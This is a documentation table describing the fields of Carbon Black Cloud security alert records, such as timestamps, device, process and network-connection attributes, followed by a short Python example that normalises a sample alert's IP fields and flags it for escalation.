backend_timestamp | Timestamp when the Carbon Black Cloud processed and enabled the alert for searching. Corresponds to the Created column on the Alerts page. | ISO 8601 UTC timestamp | CB_ANALYTICS, HOST_BASED_FIREWALL, CONTAINER_RUNTIME, DEVICE_CONTROL, WATCHLIST, INTRUSION_DETECTION_SYSTEM |
backend_update_timestamp | Timestamp when the Carbon Black Cloud initiated and processed an update to an alert. Corresponds to the Updated column on the Alerts page. Note that changes made by users do not change this date; those changes are reflected in user_update_timestamp. | ISO 8601 UTC timestamp | CB_ANALYTICS, HOST_BASED_FIREWALL, CONTAINER_RUNTIME, DEVICE_CONTROL, WATCHLIST, INTRUSION_DETECTION_SYSTEM |
blocked_effective_reputation | Effective reputation of the blocked file or process; applied by the sensor at the time the block occurred. Possible values: ADAPTIVE_WHITE_LIST, COMMON_WHITE_LIST, COMPANY_BLACK_LIST, COMPANY_WHITE_LIST, PUP, TRUSTED_WHITE_LIST, RESOLVING, COMPROMISED_OBSOLETE, DLP_OBSOLETE, IGNORE, ADWARE, HEURISTIC, SUSPECT_MALWARE, KNOWN_MALWARE, ADMIN_RESTRICT_OBSOLETE, NOT_LISTED, GRAY_OBSOLETE, NOT_COMPANY_WHITE_OBSOLETE, LOCAL_WHITE, NOT_SUPPORTED | String | CB_ANALYTICS, HOST_BASED_FIREWALL, WATCHLIST, INTRUSION_DETECTION_SYSTEM |
blocked_md5 | MD5 hash of the child process binary; for any process terminated by the sensor | String | CB_ANALYTICS, HOST_BASED_FIREWALL, WATCHLIST, INTRUSION_DETECTION_SYSTEM |
blocked_name | Tokenized file path of the files blocked by sensor action | String | CB_ANALYTICS, HOST_BASED_FIREWALL, WATCHLIST, INTRUSION_DETECTION_SYSTEM |
blocked_sha256 | SHA-256 hash of the child process binary; for any process terminated by the sensor | String | CB_ANALYTICS, HOST_BASED_FIREWALL, WATCHLIST, INTRUSION_DETECTION_SYSTEM |
childproc_cmdline | Command line for the child process | String | CB_ANALYTICS, HOST_BASED_FIREWALL, WATCHLIST, INTRUSION_DETECTION_SYSTEM |
childproc_effective_reputation | Effective reputation of the child process; applied by the sensor at the time the event occurred. Possible values: ADAPTIVE_WHITE_LIST, COMMON_WHITE_LIST, COMPANY_BLACK_LIST, COMPANY_WHITE_LIST, PUP, TRUSTED_WHITE_LIST, RESOLVING, COMPROMISED_OBSOLETE, DLP_OBSOLETE, IGNORE, ADWARE, HEURISTIC, SUSPECT_MALWARE, KNOWN_MALWARE, ADMIN_RESTRICT_OBSOLETE, NOT_LISTED, GRAY_OBSOLETE, NOT_COMPANY_WHITE_OBSOLETE, LOCAL_WHITE, NOT_SUPPORTED | String | CB_ANALYTICS, HOST_BASED_FIREWALL, WATCHLIST, INTRUSION_DETECTION_SYSTEM |
childproc_guid | Unique process identifier assigned to the child process | String | CB_ANALYTICS, HOST_BASED_FIREWALL, WATCHLIST, INTRUSION_DETECTION_SYSTEM |
childproc_md5 | Hash of the child process' binary (Enterprise EDR) | String | CB_ANALYTICS, HOST_BASED_FIREWALL, WATCHLIST, INTRUSION_DETECTION_SYSTEM |
childproc_name | Filesystem path of the child process' binary | String | CB_ANALYTICS, HOST_BASED_FIREWALL, WATCHLIST, INTRUSION_DETECTION_SYSTEM |
childproc_sha256 | Hash of the child process' binary (Endpoint Standard) | String | CB_ANALYTICS, HOST_BASED_FIREWALL, WATCHLIST, INTRUSION_DETECTION_SYSTEM |
childproc_username | User context in which the child process was executed | String | CB_ANALYTICS, HOST_BASED_FIREWALL, WATCHLIST, INTRUSION_DETECTION_SYSTEM |
connection_type (DEPRECATED) | Connection type. Possible values: INTERNAL_INBOUND, INTERNAL_OUTBOUND, INGRESS, EGRESS | String | CONTAINER_RUNTIME |
detection_timestamp | Timestamp when the alert was first detected. For sensor-sent alerts, this is the time of the event on the sensor. For alerts generated on the backend, this is the time the backend system triggered the alert. | ISO 8601 UTC timestamp | CB_ANALYTICS, HOST_BASED_FIREWALL, CONTAINER_RUNTIME, DEVICE_CONTROL, WATCHLIST, INTRUSION_DETECTION_SYSTEM |
determination | User-updatable determination of the alert | Object | CB_ANALYTICS, HOST_BASED_FIREWALL, CONTAINER_RUNTIME, DEVICE_CONTROL, WATCHLIST, INTRUSION_DETECTION_SYSTEM |
device_external_ip | IP address of the endpoint according to the Carbon Black Cloud; can differ from device_internal_ip due to a network proxy or NAT; either IPv4 (dotted decimal notation) or IPv6 (proprietary format) | String | CB_ANALYTICS, HOST_BASED_FIREWALL, DEVICE_CONTROL, WATCHLIST, INTRUSION_DETECTION_SYSTEM |
device_id | ID of the device | Integer | CB_ANALYTICS, HOST_BASED_FIREWALL, DEVICE_CONTROL, WATCHLIST, INTRUSION_DETECTION_SYSTEM |
device_internal_ip | IP address of the endpoint reported by the sensor; either IPv4 (dotted decimal notation) or IPv6 (proprietary format) | String | CB_ANALYTICS, HOST_BASED_FIREWALL, DEVICE_CONTROL, WATCHLIST, INTRUSION_DETECTION_SYSTEM |
device_location | Whether the device was on or off premises when the alert started, based on the current IP address and the device's registered DNS domain suffix. Possible values: ONSITE, OFFSITE, UNKNOWN | String | CB_ANALYTICS, HOST_BASED_FIREWALL, DEVICE_CONTROL, WATCHLIST, INTRUSION_DETECTION_SYSTEM |
device_name | Device name | String | CB_ANALYTICS, HOST_BASED_FIREWALL, DEVICE_CONTROL, WATCHLIST, INTRUSION_DETECTION_SYSTEM |
device_os | Device operating system. Possible values: WINDOWS, MAC, LINUX, OTHER | String | CB_ANALYTICS, HOST_BASED_FIREWALL, DEVICE_CONTROL, WATCHLIST, INTRUSION_DETECTION_SYSTEM |
device_os_version | The operating system and version of the endpoint. Requires Windows CBC sensor version 3.5 or later. | String | CB_ANALYTICS, HOST_BASED_FIREWALL, DEVICE_CONTROL, WATCHLIST, INTRUSION_DETECTION_SYSTEM |
device_policy | Device policy | String | CB_ANALYTICS, HOST_BASED_FIREWALL, DEVICE_CONTROL, WATCHLIST, INTRUSION_DETECTION_SYSTEM |
device_policy_id | Device policy ID | Integer | CB_ANALYTICS, HOST_BASED_FIREWALL, DEVICE_CONTROL, WATCHLIST, INTRUSION_DETECTION_SYSTEM |
device_target_value | Target value assigned to the device, set from the policy. Possible values: LOW, MEDIUM, HIGH, MISSION_CRITICAL | String | CB_ANALYTICS, HOST_BASED_FIREWALL, DEVICE_CONTROL, WATCHLIST, INTRUSION_DETECTION_SYSTEM |
device_uem_id | Device correlation with WS1/EUC, required for the Workspace ONE Intelligence integration to function | String | CB_ANALYTICS, HOST_BASED_FIREWALL, DEVICE_CONTROL, WATCHLIST, INTRUSION_DETECTION_SYSTEM |
device_username | User or device owner associated with the alert | String | CB_ANALYTICS, HOST_BASED_FIREWALL, DEVICE_CONTROL, WATCHLIST, INTRUSION_DETECTION_SYSTEM |
egress_group_id (DEPRECATED) | Unique identifier for the egress group | String | CONTAINER_RUNTIME |
egress_group_name (DEPRECATED) | Name of the egress group | String | CONTAINER_RUNTIME |
external_device_friendly_name | Human-readable external device name | String | DEVICE_CONTROL |
first_event_timestamp | Timestamp when the first event in the alert occurred | ISO 8601 UTC timestamp | CB_ANALYTICS, HOST_BASED_FIREWALL, CONTAINER_RUNTIME, DEVICE_CONTROL, WATCHLIST, INTRUSION_DETECTION_SYSTEM |
id | Unique ID of the alert | String | CB_ANALYTICS, HOST_BASED_FIREWALL, CONTAINER_RUNTIME, DEVICE_CONTROL, WATCHLIST, INTRUSION_DETECTION_SYSTEM |
ioc_field | The field the indicator of compromise (IOC) hit contains | String | WATCHLIST |
ioc_hit | IOC field value or IOC query that matches | String | WATCHLIST |
ioc_id | Unique identifier of the IOC that generated the watchlist hit | String | WATCHLIST |
ip_reputation (DEPRECATED) | Range of reputations to accept for the remote IP: 0: unknown; 1-20: high risk; 21-40: suspicious; 41-60: moderate; 61-80: low risk; 81-100: trustworthy. There must be two values in this list: the first is the lower end of the range (inclusive), the second is the upper end of the range (inclusive). | Integer | CONTAINER_RUNTIME |
is_updated | Set to true if this is an updated copy of the alert initiated by the Carbon Black Cloud backend. User workflow updates, such as adding a note, generate a new copy of the alert, but is_updated is set to false on that copy. | Boolean | CB_ANALYTICS, HOST_BASED_FIREWALL, CONTAINER_RUNTIME, DEVICE_CONTROL, WATCHLIST, INTRUSION_DETECTION_SYSTEM |
k8s_cluster (DEPRECATED) | K8s cluster name | String | CONTAINER_RUNTIME |
k8s_kind (DEPRECATED) | K8s workload kind | String | CONTAINER_RUNTIME |
k8s_namespace (DEPRECATED) | K8s namespace | String | CONTAINER_RUNTIME |
k8s_pod_name (DEPRECATED) | Name of the pod within a workload | String | CONTAINER_RUNTIME |
k8s_policy (DEPRECATED) | Name of the K8s policy | String | CONTAINER_RUNTIME |
k8s_policy_id (DEPRECATED) | Unique identifier for the K8s policy | String | CONTAINER_RUNTIME |
k8s_rule (DEPRECATED) | Name of the K8s policy rule | String | CONTAINER_RUNTIME |
k8s_rule_id (DEPRECATED) | Unique identifier for the K8s policy rule | String | CONTAINER_RUNTIME |
k8s_workload_name (DEPRECATED) | K8s workload name | String | CONTAINER_RUNTIME |
last_event_timestamp | Timestamp when the last event in the alert occurred | ISO 8601 UTC timestamp | CB_ANALYTICS, HOST_BASED_FIREWALL, CONTAINER_RUNTIME, DEVICE_CONTROL, WATCHLIST, INTRUSION_DETECTION_SYSTEM |
mdr_alert | Is the alert eligible for review by Carbon Black MDR analysts? | Boolean | |
mdr_alert_notes_present | Customer-visible notes at the alert level that were added by an MDR analyst | Boolean | |
mdr_determination | MDR-updatable classification of the alert | Object | |
mdr_workflow | MDR-updatable workflow of the alert | Object | |
ml_classification_anomalies[].anomalous_field (v2.1.0) | The specific field that is exhibiting anomalous behavior; it helps identify the exact area where the anomaly has occurred. (requires Enterprise EDR) | String | WATCHLIST |
ml_classification_anomalies[].anomalous_field_baseline_values (v2.1.0) | The normal or expected values for the data field; this helps quantify the anomaly's significance. (requires Enterprise EDR) | String[] | WATCHLIST |
ml_classification_anomalies[].anomalous_value (v2.1.0) | The actual value that was identified as an anomaly; this value contrasts with the baseline values. (requires Enterprise EDR) | String | WATCHLIST |
ml_classification_anomalies[].anomaly_name (v2.1.0) | The anomaly's name. (requires Enterprise EDR) | String | WATCHLIST |
ml_classification_final_verdict | Final verdict of the alert, based on the ML models that were used to make the prediction. Possible values: NOT_CLASSIFIED, NOT_ANOMALOUS, ANOMALOUS | String | WATCHLIST |
ml_classification_global_prevalence | Categories (low/medium/high) used to describe the prevalence of alerts across all regional organizations. Possible values: UNKNOWN, LOW, MEDIUM, HIGH | String | WATCHLIST |
ml_classification_org_prevalence | Categories (low/medium/high) used to describe the prevalence of alerts within an organization. Possible values: UNKNOWN, LOW, MEDIUM, HIGH | String | WATCHLIST |
netconn_local_ip | IP address of the local side of the network connection; stored as dotted decimal | String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME WATCHLIST INTRUSION_DETECTION_SYSTEM |
netconn_local_ipv4 | IPv4 address of the local side of the network connection; stored as dotted decimal. Only one of the ipv4 and ipv6 fields will be populated. | String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME WATCHLIST INTRUSION_DETECTION_SYSTEM |
netconn_local_ipv6 | IPv6 address of the local side of the network connection; stored as a string without the octet-separating colon characters. Only one of the ipv4 and ipv6 fields will be populated. | String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME WATCHLIST INTRUSION_DETECTION_SYSTEM |
netconn_local_port | TCP or UDP port used by the local side of the network connection | Integer | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME WATCHLIST INTRUSION_DETECTION_SYSTEM |
netconn_protocol | Network protocol of the network connection | String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME WATCHLIST INTRUSION_DETECTION_SYSTEM |
netconn_remote_domain | Domain name (FQDN) associated with the remote end of the network connection, if available | String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME WATCHLIST INTRUSION_DETECTION_SYSTEM |
netconn_remote_ip | IP address of the remote side of the network connection; stored as dotted decimal | String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME WATCHLIST INTRUSION_DETECTION_SYSTEM |
netconn_remote_ipv4 | IPv4 address of the remote side of the network connection; stored as dotted decimal. Only one of the ipv4 and ipv6 fields will be populated. | String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME WATCHLIST INTRUSION_DETECTION_SYSTEM |
netconn_remote_ipv6 | IPv6 address of the remote side of the network connection; stored as a string without the octet-separating colon characters. Only one of the ipv4 and ipv6 fields will be populated. | String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME WATCHLIST INTRUSION_DETECTION_SYSTEM |
netconn_remote_port | TCP or UDP port used by the remote side of the network connection; same as netconn_port and event_network_remote_port | Integer | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME WATCHLIST INTRUSION_DETECTION_SYSTEM |
org_key | Unique alphanumeric string that identifies your organization in the Carbon Black Cloud | String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
parent_cmdline | Command line of the parent process | String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
parent_effective_reputation | Effective reputation of the parent process; applied by the sensor when the event occurred. Values: ADAPTIVE_WHITE_LIST, COMMON_WHITE_LIST, COMPANY_BLACK_LIST, COMPANY_WHITE_LIST, PUP, TRUSTED_WHITE_LIST, RESOLVING, COMPROMISED_OBSOLETE, DLP_OBSOLETE, IGNORE, ADWARE, HEURISTIC, SUSPECT_MALWARE, KNOWN_MALWARE, ADMIN_RESTRICT_OBSOLETE, NOT_LISTED, GRAY_OBSOLETE, NOT_COMPANY_WHITE_OBSOLETE, LOCAL_WHITE, NOT_SUPPORTED | String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
parent_guid | Unique process identifier assigned to the parent process | String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
parent_md5 | MD5 hash of the parent process binary | String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
parent_name | Filesystem path of the parent process binary | String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
parent_pid | Identifier assigned by the operating system to the parent process | Integer | |
parent_reputation | Reputation of the parent process; applied by the Carbon Black Cloud when the event is initially processed. Values: ADAPTIVE_WHITE_LIST, COMMON_WHITE_LIST, COMPANY_BLACK_LIST, COMPANY_WHITE_LIST, PUP, TRUSTED_WHITE_LIST, RESOLVING, COMPROMISED_OBSOLETE, DLP_OBSOLETE, IGNORE, ADWARE, HEURISTIC, SUSPECT_MALWARE, KNOWN_MALWARE, ADMIN_RESTRICT_OBSOLETE, NOT_LISTED, GRAY_OBSOLETE, NOT_COMPANY_WHITE_OBSOLETE, LOCAL_WHITE, NOT_SUPPORTED | String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
parent_sha256 | SHA-256 hash of the parent process binary | String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
parent_username | User context in which the parent process was executed | String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
policy_applied | Indicates whether or not a policy has been applied to any event associated with this alert. Values: APPLIED, NOT_APPLIED | String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
primary_event_id | ID of the primary event in the alert | String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
process_cmdline | Command line executed by the actor process | String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
process_effective_reputation | Effective reputation of the actor process hash. Values: ADAPTIVE_WHITE_LIST, COMMON_WHITE_LIST, COMPANY_BLACK_LIST, COMPANY_WHITE_LIST, PUP, TRUSTED_WHITE_LIST, RESOLVING, COMPROMISED_OBSOLETE, DLP_OBSOLETE, IGNORE, ADWARE, HEURISTIC, SUSPECT_MALWARE, KNOWN_MALWARE, ADMIN_RESTRICT_OBSOLETE, NOT_LISTED, GRAY_OBSOLETE, NOT_COMPANY_WHITE_OBSOLETE, LOCAL_WHITE, NOT_SUPPORTED | String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
process_guid | GUID of the process that fired the alert (optional) | String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
process_issuer | The certificate authority associated with the process's certificate | String[] | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
process_md5 | MD5 hash of the actor process binary | String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
process_name | Name of the actor process associated with the alert | String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
process_pid | PID of the process that fired the alert (optional) | Integer | |
process_publisher | Publisher name on the certificate used to sign the Windows or macOS process binary | String[] | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
process_reputation | Reputation of the actor process; applied when the event is processed by the Carbon Black Cloud. Values: ADAPTIVE_WHITE_LIST, COMMON_WHITE_LIST, COMPANY_BLACK_LIST, COMPANY_WHITE_LIST, PUP, TRUSTED_WHITE_LIST, RESOLVING, COMPROMISED_OBSOLETE, DLP_OBSOLETE, IGNORE, ADWARE, HEURISTIC, SUSPECT_MALWARE, KNOWN_MALWARE, ADMIN_RESTRICT_OBSOLETE, NOT_LISTED, GRAY_OBSOLETE, NOT_COMPANY_WHITE_OBSOLETE, LOCAL_WHITE, NOT_SUPPORTED | String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
process_sha256 | SHA-256 hash of the actor process binary | String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
process_username | User context in which the actor process was executed. macOS: all users for the PID across fork() and exec() transitions. Linux: the process user for exec() events; a future sensor release may make this multi-valued because of setuid(). | String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
product_id | Product ID that identifies the USB device | String | DEVICE_CONTROL |
product_name | Product name that identifies the USB device | String | DEVICE_CONTROL |
reason | A natural-language explanation of what occurred, why the alert was raised, and any action taken; usually 1 to 3 sentences. | String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
reason_code | A unique short-hand code or GUID identifying the particular alert reason | String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
remote_is_private (DEPRECATED) | Whether the remote side is private: true or false | Boolean | CONTAINER_RUNTIME |
remote_k8s_kind (DEPRECATED) | Kind of the remote workload; set if the remote side is another workload in the same cluster | String | CONTAINER_RUNTIME |
remote_k8s_namespace (DEPRECATED) | Namespace within the remote workload's cluster; set if the remote side is another workload in the same cluster | String | CONTAINER_RUNTIME |
remote_k8s_pod_name (DEPRECATED) | Pod name of the remote workload; set if the remote side is another workload in the same cluster | String | CONTAINER_RUNTIME |
remote_k8s_workload_name (DEPRECATED) | Name of the remote workload; set if the remote side is another workload in the same cluster | String | CONTAINER_RUNTIME |
report_description | Description of the watchlist report associated with the alert | String | WATCHLIST |
report_id | ID of the report that contained the IOC that caused the hit | String | WATCHLIST |
report_link | Link to the report that contained the IOC that caused the hit | String | WATCHLIST |
report_name | Name of the watchlist report | String | WATCHLIST |
report_tags | Tags associated with the watchlist report | String[] | WATCHLIST |
rule_category_id | ID representing the category of the rule_id for certain alert types | String | CB_ANALYTICS HOST_BASED_FIREWALL INTRUSION_DETECTION_SYSTEM |
rule_id | ID of the rule that triggered the alert; applies to Intrusion Detection System, Host-Based Firewall, TAU Intelligence, and USB Device Control alerts | String | CB_ANALYTICS HOST_BASED_FIREWALL INTRUSION_DETECTION_SYSTEM |
run_state | Whether the threat in the alert actually ran. Values: DID_NOT_RUN, RAN, UNKNOWN | String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
sensor_action | Action taken by the sensor, according to the rules of the applied policy. Values: ALLOW, DENY, TERMINATE | String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
serial_number | Serial number of the specific USB device | String | DEVICE_CONTROL |
severity | Integer representation of the impact of the alert if it is a true positive | Integer | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
threat_id | ID assigned to a group of alerts with common criteria, based on alert type | String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
threat_name | Name of the threat | String | INTRUSION_DETECTION_SYSTEM |
tms_rule_id | Detection ID | String | INTRUSION_DETECTION_SYSTEM |
ttps | Other potentially malicious activities involved in the threat | String[] | CB_ANALYTICS WATCHLIST INTRUSION_DETECTION_SYSTEM |
type | Type of alert generated. Values: CB_ANALYTICS, WATCHLIST, DEVICE_CONTROL, CONTAINER_RUNTIME, HOST_BASED_FIREWALL, INTRUSION_DETECTION_SYSTEM, NETWORK_TRAFFIC_ANALYSIS | String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
user_update_timestamp | Timestamp of the last change a user made to a property of the alert, such as the workflow or determination | ISO 8601 UTC timestamp | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
vendor_id | ID of the vendor that produced the USB device | String | DEVICE_CONTROL |
vendor_name | Name of the vendor that produced the USB device | String | DEVICE_CONTROL |
version | The version of the schema being emitted, e.g. 2.1.0 | String | |
watchlists[].id | ID of each watchlist associated with the alert. Alerts are batched hourly | String | WATCHLIST |
watchlists[].name | Name of each watchlist associated with the alert. Alerts are batched hourly | String | WATCHLIST |
workflow | Current workflow state of the alert. The workflow represents the flow from OPEN to IN_PROGRESS to CLOSED and captures who moved the alert into the current state. The history of these state transitions is available via the alert history route. | Object | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
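As an added example (not part of the schema page or the Carbon Black Cloud SDK), the following Python normalizes the network-connection and triage fields of one forwarded alert record: it expands the colon-less IPv6 form the netconn_*_ipv6 fields use, enforces the rule that only one of ipv4/ipv6 is populated, and applies an illustrative escalation check over run_state, sensor_action and severity. The sample record, the severity threshold and the escalation rule are constructed assumptions, not product behaviour.

```python
import ipaddress
import json

# Constructed sample record: field names follow the schema above, values are made up.
SAMPLE_ALERT = json.dumps({
    "type": "INTRUSION_DETECTION_SYSTEM",
    "severity": 7,
    "run_state": "RAN",
    "sensor_action": "ALLOW",
    "netconn_local_ipv4": "10.0.0.5",
    "netconn_local_port": 51234,
    # IPv6 as the forwarder emits it: 32 hex digits, no colons (2001:db8::1)
    "netconn_remote_ipv6": "20010db8000000000000000000000001",
    "netconn_remote_port": 443,
})

def ipv6_from_nocolon(s: str) -> str:
    """Expand the colon-less IPv6 form into RFC 5952 text, e.g. '2001:db8::1'."""
    if len(s) != 32:
        raise ValueError(f"expected 32 hex digits, got {len(s)}")
    return str(ipaddress.IPv6Address(int(s, 16)))

def endpoint(alert: dict, side: str) -> "str | None":
    """Return the IP for side 'local' or 'remote' from whichever family is populated."""
    v4 = alert.get(f"netconn_{side}_ipv4")
    v6 = alert.get(f"netconn_{side}_ipv6")
    if v4 and v6:  # the schema says only one of the two is ever set
        raise ValueError(f"both ipv4 and ipv6 populated for {side} side")
    if v4:
        return str(ipaddress.IPv4Address(v4))  # validates the dotted-decimal form
    if v6:
        return ipv6_from_nocolon(v6)
    return None

def needs_escalation(alert: dict, min_severity: int = 5) -> bool:
    """Illustrative triage rule (assumption): threat ran, sensor allowed it, severity is high."""
    return (alert.get("run_state") == "RAN"
            and alert.get("sensor_action") == "ALLOW"
            and int(alert.get("severity", 0)) >= min_severity)

def summarize(raw: str) -> dict:
    """Parse one forwarded alert record (a JSON string) into a flat triage summary."""
    alert = json.loads(raw)
    return {
        "type": alert.get("type"),
        "local": endpoint(alert, "local"),
        "remote": endpoint(alert, "remote"),
        "remote_port": alert.get("netconn_remote_port"),
        "escalate": needs_escalation(alert),
    }
```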
Last modified on April 21, 2025